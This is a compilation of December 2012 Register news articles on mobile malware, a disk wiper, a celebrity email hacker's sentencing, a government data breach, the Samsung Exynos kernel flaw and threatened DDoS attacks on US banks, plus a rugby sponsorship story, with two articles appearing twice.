STE WILLIAMS

A Trojan that infects Android devices is behind an increase in text message spam in the US.

SpamSoldier infects smartphones and spews out thousands of SMS messages without the user’s permission. The mobile irritant is primarily spreading through texts that offer free versions of popular paid-for games such as Need for Speed: Most Wanted and Angry Birds Space.

Marks are encouraged to click on a web link in a message that supposedly leads to a game installer. In reality users who open the “installer app” only succeed in infecting their handset with the SpamSoldier Trojan.

Once in place, SpamSoldier gets to work sending more booby-trapped messages, spreading itself further in the process. In some cases a free version of a mobile game may even be installed to distract the user and cover up the fact the smartphone has become a spam-spewing bot.

The software nasty is spreading in the US, according to mobile anti-spam specialist Cloudmark.

“Once infected, a user’s phone will be used to silently send out thousands of spam SMS messages without permission to lists of victim phone numbers that the malware automatically downloads from a command-and-control server,” according to Cloudmark researcher Andrew Conway. “We’ve seen a peak rate so far of over half a million SMS messages per day.”

“This sort of attack changes the economics of SMS spam, as the spammer no longer has to pay for messages that are sent if he can use a botnet to control devices and cover his costs,” it added.

The Trojan is distributed from, largely, .mobi sites on a server in Hong Kong. The scammer behind the app first latched onto the idea in late October, brazenly punting the Trojan as an anti-SMS spam utility before switching to mobile gaming last month, a ploy that’s proved much more successful. Over the last three weeks or so the unidentified crook behind the scam has started earning cash from his mobile botnet.

“On 28 November the spammer decided to start monetizing,” Conway explained in a blog post on the SpamSoldier threat. “The free game messages continued, but there were also free gift card scam messages mixed in.”

The bogus gift card messages state:

You have just won a $1000 Target Gift Card but only the 1st 777 people that enter code 777 at http://[redacted].com can claim it!

“Of course, there are not really any free gift cards, this is just a trick to collect your personal information for affiliate programmes and sometimes identity theft,” Conway warned.

Cloudmark described the threat as the “first functioning Android botnet sending SMS spam” although it notes that several PC botnets capable of sending spam via email to text message gateways have occasionally cropped up in the past. Mobile malware that sends SMS messages to premium numbers from compromised smartphones is far more commonplace.

An advisory by phone security firm Lookout confirmed that SpamSoldier is targeting US mobile users; the list of targeted numbers downloaded from the botnet typically contains 100 US numbers at a time. It added that the distribution of the malware remains “relatively limited”.

“Even at these limited distribution levels, SpamSoldier still has the potential to make a big impact at a network level: a single prolonged infection could result in thousands of SMS spam messages,” writes Lookout researcher Derek Halliday.

“Overall detections remain low but we’ve observed instances on all major US carriers. The potential impact to mobile networks may be significant if the threat goes undetected for a long period of time. The primary negative impact appears to be the large amount of SMS messages sent and the potential this has to result in charges to the user and/or a slowdown of the carrier’s network.”

Halliday added: “The sole infection vector appears to be spam SMS messages; we have not yet detected SpamSoldier on any major app stores.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/19/spamsoldier_android_botnet/

A surprisingly simple disk-wiping malware has set off alarm bells in Iran after surfacing in the Middle East nation.

The software nasty deletes everything on storage drives attached to infected Windows PCs on specific dates, according to the Iranian security emergency response team. The malware was detected in one or more targeted attacks although the identity of the intended victim is not known.

Its operation is similar to the data-destroying worm Shamoon that ransacked Gulf oil giants earlier this year, but the two pieces of software otherwise appear unrelated.

BatchWiper, as the snared malware’s name suggests, uses a Windows batch file to remove files from infected machines, according to an analysis by security tools biz AlienVault.

A self-extracting RAR archive called GrooveMonitor.exe is used to drop the malware’s files onto a system. However the same software nasty can easily be packaged in other ways and appear under different guises.

Jaime Blasco, labs manager at AlienVault, said that it is not clear how BatchWiper malware is spreading. “The dropper could be deployed using several vectors, ranging from spear phishing emails, infected USB drives, via some other malware already running on computers, or an internal actor uploading it to network shares,” he said.

Blasco concludes that despite its simplicity, BatchWiper is capable of causing significant irritation if its file-wiping code is executed. Once that kicks in, it’s time to break out the backups or your favourite undelete utility. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/19/batchwiper/

A US man who hacked into the email accounts of celebrities including Scarlett Johansson and Mila Kunis and later leaked their nude photos has been sentenced to 10 years in prison.

Former office clerk Christopher Chaney, who claims he was “addicted” to spying on celebrities’ private lives, leaked naked pictures of the shlebs to two celebrity gossip websites and a hacker.

Scarlett Johanssen said in a video statement to the court that the leaked images, which were selfies she snapped while topless, were taken for her then-husband Ryan Reynolds, and said she had been “truly humiliated and embarrassed” when they turned up online.

Prosecutors said Chaney had illegally accessed the email accounts of more than 50 celebrities between November 2010 and October 2011, including an account belonging to singer Christina Aguilera. He was charged with 28 counts relating to hacking and made a plea deal for cases in nine felony courts, Reuters reported.

He was also ordered to pay $66,179 in restitution to victims.

“I don’t know what else to say except I’m sorry,” Chaney said during his sentencing. “This will never happen again.”

Chaney was arrested after an FBI investigation dubbed “Operation Hackerazzi” in October 2011. After his arrest, he told a Florida television station that he had started hacking into celebrity email accounts out of curiosity and then became “addicted”.

“I was almost relieved months ago when they came in and took my computer … because I didn’t know how to stop,” he said.

Prosecutors alleged that Chaney had also stalked two Florida women online, one since 1999 when she was 13 years old. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/18/hackerazzi_hacker_jailed/

Criminals used the personal data of 100,000 civil servants that was swiped in early 2010 in an attack on HMRC around the same time, The Register has discovered. Now, almost three years later, the government is still scrabbling around trying to work out whodunnit… and only recently ‘fessed up to the individuals concerned that their data had been snaffled.

Just last month, the Civil Service Sports Council informed civil servants who signed up to access football fields and gyms through the council that their personal details had been slurped. Now it has emerged that their data was used as ammunition in a broadside against the tax collectors – a previously unknown and unreported attack.

It is understood that no “individual fraud” was committed, but the data could theoretically have been used by crims to draw ghost benefits or even ghost salaries from the government department. Nevertheless, until recently, none of the targets were informed that their data had been compromised.

Leaky database was juicy target

The three-year-old attack came to light a few weeks ago when the Sports Council revealed to its 100,000+ members that their personal data had been stolen by hackers some time before February 2010.

A leaky database at the Civil Service Sports Council gave the crims the opportunity to steal the names, addresses, dates of birth and national insurance numbers of the entire sports-playing members. And they did. Because the database was unencrypted and all information was logged together, a simple SQL injection was all it would have taken to crack the database open and filch the details.

So far so standard. No inside knowledge of the civil service’s sports club was required either: a simple crawl and probe bot – a programme that searches the web for vulnerable databases – could have picked on the shoddy data storage simply from roving around online. The size of the data trove and the fact that it contained national insurance numbers made it a particularly juicy target.

How the data could have been used to hack the government

Then it gets more complicated. The Sports Council says there is “no evidence” that the data was used to attempt individual fraud, but does say it was used in an attempt to defraud central government.

That doesn’t stack up for Trend Micro Security expert Rik Ferguson, who makes a comparison to the HMRC data loss of 2007 when the personal details of 25 million recipients of child benefits were lost after unencrypted CDs went astray. Then there was no suggestion that the stray data would be used against government but HMRC nevertheless had to warn all 25 million recipients that it might be used against them in personal fraud attacks.

“It was exactly the same data that was in Sports Council database – names, addresses, national insurance numbers,” says Ferguson, “so I don’t know why they suspected it would be used in a different area this time.”

The data was used to perpetrate an attack on government according to the Sports Council, and an HMRC spokesperson has confirmed to The Register that the tax-collecting and benefit-dealing ministry had suffered an attack and was investigating it.

HMRC has said it can’t comment on the investigation as it is ongoing: so we don’t know the nature of the attack, or whether it was successful.

We do know that it involved the personal details of the civil service sports council members, that it happened in or before February 2010, that it is subject to criminal investigation and we can surmise that it was big.

Why do we think it was big? Two reasons: first that it was significant enough for HMRC to set an internal team investigating it. Second, the fact that the internal investigators were able to trace the cracked data back to the sports club. If 15 or 30 jilted national insurance numbers were used, it would have been difficult to make a connection that led back to the Sports Council. For the investigators to track it back, the data must have been used in sufficient quantities for them to work out that the fraudulently used national insurance numbers came from a single source – the Sports Council membership list.

How exactly the data could have been used to force the system is open to speculation. A national insurance number, date of birth and address would be all you need to set up a account, and presumably to access benefits or even a salary, though doing it on a large scale would be extremely complicated. Trend Micro’s Ferguson says:

That data for a single person gives you everything that you need to commit personal financial fraud, which would be fraud against a financial institution.If you have what you need for benefit fraud, then you have what you need for all financial fraud. Fraud is fraud.

A civil servant who spoke to The Register explained that National Insurance numbers are used as payroll identifiers in the civil service. Still, the attack mechanism must been relatively complex:

I don’t think it would be done in batches; they have software that picks up patterns of behaviour like that, so only certain individuals will have been affected.

Data will most likely be used for personal fraud

Ferguson was sceptical of the Sports Council’s assurance that the data had not and would not be used in personal fraud attacks:

If you’re the person responsible for stealing that, you’re going to be offering that up for sale in underground forums then that will be sold in small amounts. That’s another argument for why you can’t have any certainty about how the data will end up being used.

The UK’s watchdog for data protection – the Information Commissioner’s Office (ICO) – the public’s white knight on matters of individual data privacy – was informed about the breach by the Sports Council just after it found out, on 18 February 2010, but turned over the duty of investigation to HMRC, spokesperson Greg Jones told El Reg.

Following the database ransack, the Sports Council has significantly cleaned up their database security, it says. Pressed for a statement, CSSC would only reiterate its initial statement to members: that there had been a criminal investigation into the hack, that the data had been used against government but not – to their knowledge – against individuals.

There was no evidence of any risk to individuals since the fraud concerned attempts to defraud central government rather than individuals.

The CSSC would not disclose the extra development in the investigation that meant they decided to inform all members of the breach on 25 November, two years and nine months after they found out about it. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/18/civil_servants_data_used_to_attack_hmrc/

Australian Rugby League team the Manly Warringah Sea Eagles has changed its name to the Kaspersky Sea Eagles, only to retract the name change hours later after a backlash from fans.

Rugby League is a 13-a-side version of rugby. The sport is popular in northern England and the east coast of Australia, where interest is sufficiently high that Rupert Murdoch once formed a breakaway rebel competition to lure punters to his pay TV interests. Elsewhere in the world the game is obscure and unloved, except in Papua New Guinea where it is the national sport.

Manly is a somewhat insular Sydney beachside suburb, and its team is the supporters of other clubs love to hate. But yesterday its supporters hated it too, after the club cemented a sponsorship deal with Kaspersky Lab by issuing a press release announcing it will henceforth be known as the “Kaspersky Sea Eagles”. The name change came after a new deal that will see Kaspersky appear on the team’s jerseys for three years until 2015. Kaspersky has sponsored the team since 2011.

Fans, including television weatherman Tim Bailey, promptly took to forums and social media to decry the besmirching of the club’s name.

A mere two hours later, the club issued another press release, this time saying it will forever be called the Manly Warringah Sea Eagles, but that it will be the Kaspersky Sea Eagles for administrative purposes in order to help the antivirus company extract maximum value from its sponsorship dollar.

@manlyseaeagles Kapersky Sea Eagles. Plain ridiculous – even INTERNALLY. What a croc.

— Tim Bailey (@dailybailey10) December 17, 2012

Kaspersky also sponsors the Collingwood Magpies, the richest and most-hated team in the Australian Football League. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/18/football_club_drops_kaspersky_name/

Australian Rugby League team the Manly Warringah Sea Eagles has changed its name to the Kaspersky Sea Eagles, only to retract the name change hours later after a backlash from fans.

Rugby League is a 13-a-side version of rugby. The sport is popular in northern England and the east coast of Australia, where interest is sufficiently high that Rupert Murdoch once formed a breakaway rebel competition to lure punters to his pay TV interests. Elsewhere in the world the game is obscure and unloved, except in Papua New Guinea where it is the national sport.

Manly is a somewhat insular Sydney beachside suburb, and its team is the supporters of other clubs love to hate. But yesterday its supporters hated it too, after the club cemented a sponsorship deal with Kaspersky Lab by issuing a press release announcing it will henceforth be known as the “Kaspersky Sea Eagles”. The name change came after a new deal that will see Kaspersky appear on the team’s jerseys for three years until 2015. Kaspersky has sponsored the team since 2011.

Fans, including television weatherman Tim Bailey, promptly took to forums and social media to decry the besmirching of the club’s name.

A mere two hours later, the club issued another press release, this time saying it will forever be called the Manly Warringah Sea Eagles, but that it will be the Kaspersky Sea Eagles for administrative purposes in order to help the antivirus company extract maximum value from its sponsorship dollar.

@manlyseaeagles Kapersky Sea Eagles. Plain ridiculous – even INTERNALLY. What a croc.

— Tim Bailey (@dailybailey10) December 17, 2012

Kaspersky also sponsors the Collingwood Magpies, the richest and most-hated team in the Australian Football League. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/18/football_club_drops_kaspersky_name/

Anonymous has posted personal data of many members of the Westboro Baptist Church and is promising to shut down the religious sect after it announced plans to protest the funerals of those killed at Sandy Hook Elementary School last week.

“We have unanimously deemed your organization to be harmful to the population of the USA, and have therefore decided to execute an agenda of action which will progressively dismantle your institution of deceitful pretext and extreme bias, and cease when your zealotry runs dry,” the hacking group said in the now-traditional video.

“We recognize you as serious opponents, and do not expect our campaign to terminate in a short period of time. Attrition is our weapon, and we will waste no time, money, effort, and enjoyment, in tearing your resolve into pieces, as with exposing the incongruity of your distorted faith.”

The upload to Pastebin shows names, addresses, birth dates, emails, and phone numbers for many of the WBC members, along with domain details for the many sites it owns, including godhatesfags.com, beastobama.com, and godhatesthemedia.com. That’s pretty basic stuff, but Anonymous claims this is just the start.

The group also publicized an online petition to the US government calling for the WBC to be officially designated a hate group. So far it has acquired over 100,000 signatures, well over the threshold required for official comment (once the White House is finished preparing a statement on the building of a Death Star.)

This isn’t the first time Anonymous and the WBC have had a run-in. Last year the group declared another action against the WBC, and hacked the sect’s website live during an online debate with the WBC clan matriarch Shirley Phelps-Roper. But the hacking group says this time it’s playing for keeps.

In a separate but related attack, a Twitter account belonging to Phelps-Roper has been taken over by someone claiming to be teenage member of the UG Nazi hacker collective Cosmo the God. If so, it’s not exactly a smart move, since Cosmo is currently doing six years of probation, part of which is a commitment to stay offline – but the Sandy Hook shootings have aroused strong emotions in America.

Even before the bodies of the victims were removed from the scene of the shooting, the WBC announced its intention to protest the funerals of those slain. In her twitter feed, Shirley Phelps-Roper originally blamed the shooting on Connecticut’s decision to legalize gay marriage, and said the group would be at the funerals.

The WBC makes a living out of trekking to funerals across the US to preach their message that everyone in the world is going to hell apart from them, and that such tragic events as Sandy Hook are proof of this. The group, which has barely 100 (mostly family) members, also has a lucrative sideline in suing those who attack them, of whom there are many.

So far various groups have said they will gather to block off any sight of the WBC’s protests from families attending funerals. While the Supreme Court has upheld the WBC’s right to protest, they can expect to be swamped by those seeking to block out their message. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/17/anonymous_westboro_baptist_hack/

A member of an XDA developers forum who calls him-or-herself Alephzain claims to have found a flaw in several Samsung handsets and tablets that could allow attackers to enjoy full access to their RAM.

Alephzain posted news of the embarrassing bug here, stating: “The security hole is in [the] kernel, exactly with the device /dev/exynos-mem.”

Thanks to exynos-mem’s wide-open file system permissions, it can be read from and written to by any software running on the handheld, acting as a portal to the device’s physical memory and allowing malicious code to do pretty much anything it wants.

Exynos is Samsung’s ARM-based system-on-a-chip and is found in a great many of its Linux-powered Android devices.

Alephzain’s asessment of the flaw follows:

The good news is we can easily obtain root on these devices and the bad is there is no control over it.

Ram dump, kernel code injection and others could be possible via app installation from Play Store. It certainly exists many ways to do that but Samsung give an easy way to exploit. This security hole is dangerous and expose phone to malicious apps.

Exploitation with native C and JNI could be easily feasible.

The flaw has attracted attention from others in the same forums, one of which – Chainfire – has thoughtfully provided an exploit for the flaw and warned “any app can use it to gain root without asking and without any permissions on a vulnerable device”, adding “let’s hope for some fixes ASAP”.

Devices in trouble are said to include the Galaxy SIII, Galaxy Note, Galaxy Note 2 and Galaxy 10.1 tablets.

Members of the XDA developers community are evidently quite keen on the flaw, as it will allow them to do some low level hacking on their preferred Samsung devices. Community members say they’ve told Samsung about the problem, which should allow the rest of us to Keep Calm and Not Download Apps until a fix is issued. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/17/samsung_exynos_flaw/

Hackers who claimed responsibility for a series of denial of service attacks against US banks in September have warned the US they plan to renew their assault shortly.

The Izz ad-Din al-Qassam Cyber Fighters named US Bancorp, JP Morgan Chase, Bank of America, PNC Financial Services Group and SunTrust as possible attack targets for the second phase of its Ababil operation. “In new phase, the wideness and the number of attacks will increase explicitly; and offenders and subsequently their governmental supporters will not be able to imagine and forecast the widespread and greatness of these attacks,” it said in a statement posted on Pastebin on Monday.

The group of hackers continue to be incensed with the presence of the inflammatory and amateurish Innocence of Muslims video on YouTube. Pull the film and the attacks will be called off or stopped, the group says. The group doesn’t accept arguments that the banks have no influence on clips hosted by YouTube.

Security researchers analysing the earlier attacks quickly came to the conclusion that they were largely powered by bots. DDoS mitigation experts Arbor Networks reckons most of the attack traffic was launched from insecure websites rather than malware-infected PCs.

Many compromised PHP web applications were used as bots in the [September] attacks. Additionally, many WordPress sites, often using the out-of-date TimThumb plugin, were being compromised around the same time. Joomla and other PHP-based applications were also compromised. Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools.

Several PHP-based tools were used in the September attacks, the most prominent of which was Brobot along with two other tools, KamiKaze and AMOS. A revamped version of the tool has been deployed in the second phase of the attacks, which have already begun to surface.

On December 11, 2012, attacks on several of these victims were observed. Some attacks looked similar in construction to Brobot v1, however there is a newly crafted DNS packet attack and a few other attack changes in Brobot v2.

A blog post by Arbor covering lessons learned from earlier attacks as well as preliminary observations about the latest run of assaults can be found here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/17/us_bank_ddos_assaults/

A member of an XDA developers forum who calls him-or-herself alephzain claims to have found a flaw in several Samsung handsets and tablets that could allow attackers to enjoy access to their RAM.

Alephzain posted news of the flaw here, stating that “The security hole is in kernel, exactly with the device /dev/exynos-mem.”

Exynos is Samsung’s ARM-based system on a chip and is found in a great many of its devices.

Alephzain’s asessment of the flaw follows:

“The good news is we can easily obtain root on these devices and the bad is there is no control over it.

Ram dump, kernel code injection and others could be possible via app installation from Play Store. It certainly exists many ways to do that but Samsung give an easy way to exploit. This security hole is dangerous and expose phone to malicious apps.

Exploitation with native C and JNI could be easily feasible.”

The flaw has attracted attention from others in the same forums, one of which – Chainfire – has thoughtfully provided an exploit for the flaw and warned “any app can use it to gain root without asking and without any permissions on a vulnerable device” before adding “Let’s hope for some fixes ASAP.”

Devices in trouble are said to include the Galaxy SIII, Galaxy Note, Galaxy Note 2 and Galaxy 10.1 tablets.

Members of the XDA developers community are evidently quite keen on the flaw, as it will allow them to do some low level hacking on their preferred Samsung devices. Community members say they’ve told Samsung about the problem, which should allow the rest of us to Keep Calm and Not Download Apps until a fix is issued. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/12/17/samsung_exynos_flaw/